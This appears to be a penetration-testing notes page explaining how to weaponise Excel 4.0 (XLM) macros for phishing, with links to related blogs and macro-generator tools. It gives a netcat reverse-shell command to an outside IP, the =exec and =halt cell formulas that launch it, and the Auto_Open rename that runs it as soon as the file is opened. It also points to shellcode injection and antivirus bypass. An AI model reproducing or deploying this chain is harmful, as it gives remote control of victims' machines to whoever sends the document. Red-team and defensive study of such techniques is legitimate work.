⭕XLM Macro 4.0

Old school: evil Excel 4.0 macros (XLM) | Outflank BlogOutflank Blog

XLM (Excel 4.0) Macro Generator for Phishing CampaignsFortyNorth Security Blog

A Microsoft Excel Spreadsheet can be weaponized by firstly inserting a new sheet of type "MS Execel 4.0 Macro":

shell.cmd :

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

We can then execute command by typing into the cells:

=exec("c:\shell.cmd")
=halt()

Note how we need to rename the A1 cell to Auto_Open if we want the Macros to fire off once the document is opened:

5MB

Excel 4.0 Macro Functions Reference (1).pdf

pdf

8KB

phishing-xlm.xlsm

Opening the document and enabling Macros pops a reverse shell:

Note that XLM Macros allows using Win32 APIs, hence shellcode injection is also possible. See the original research link below for more info.

Launch shellcodes and bypass Antivirus using MacroPack Pro VBA (...) - Sevagas

Direct shellcode execution in MS Office macrosThoughts on Security

Malicious Document – Shellcode InjectionMalsechunter

BadAssMacros: C# based automated Malicous Macro GeneratorPenetration Testing